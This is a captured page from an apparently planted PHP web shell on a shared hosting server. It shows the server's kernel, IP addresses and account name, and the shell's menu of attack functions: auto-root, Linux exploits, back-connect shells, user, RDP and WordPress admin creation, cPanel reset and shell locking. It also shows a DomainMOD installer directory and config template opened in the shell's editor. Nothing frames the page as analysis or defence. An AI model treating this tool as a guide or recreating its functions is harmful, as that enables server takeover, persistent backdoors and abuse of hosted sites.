Linux host45.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
: 198.54.116.152 | : 216.73.216.143
Cant Read [ /etc/named.conf ]
8.1.32
bankpromax
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
domainmod /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
changelog.txt
722
B
-rw-r--r--
clone.php
4.8
KB
-rw-r--r--
config.inc.php
1.15
KB
-rw-r--r--
domainmod.sql
82.32
KB
-rw-r--r--
domainmod.zip
8.74
MB
-rw-r--r--
edit.php
4.43
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
fileindex.php
421
B
-rw-r--r--
import.php
3.23
KB
-rw-r--r--
info.xml
4.24
KB
-rw-r--r--
install.js
924
B
-rw-r--r--
install.php
3.8
KB
-rw-r--r--
install.xml
1.12
KB
-rw-r--r--
md5
1.05
KB
-rw-r--r--
notes.txt
713
B
-rw-r--r--
upgrade.php
2.55
KB
-rw-r--r--
upgrade.xml
311
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : config.inc.php
<?php /** * /_includes/config.SAMPLE.inc.php * * This file is part of DomainMOD, an open source domain and internet asset manager. * Copyright (c) 2010-2025 Greg Chetcuti <greg@greg.ca> * * Project: http://domainmod.org Author: https://greg.ca * * DomainMOD is free software: you can redistribute it and/or modify it under the terms of the GNU General Public * License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later * version. * * DomainMOD is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied * warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. * * You should have received a copy of the GNU General Public License along with DomainMOD. If not, see * http://www.gnu.org/licenses/. * */ ?> <?php // Path Settings $web_root = '[[relativeurl]]'; // don't include trailing slash (if you're installing in the root just leave this blank) // Database Settings $dbhostname = '[[softdbhost]]'; $dbname = '[[softdb]]'; $dbusername = '[[softdbuser]]'; $dbpassword = '[[softdbpass]]';
Close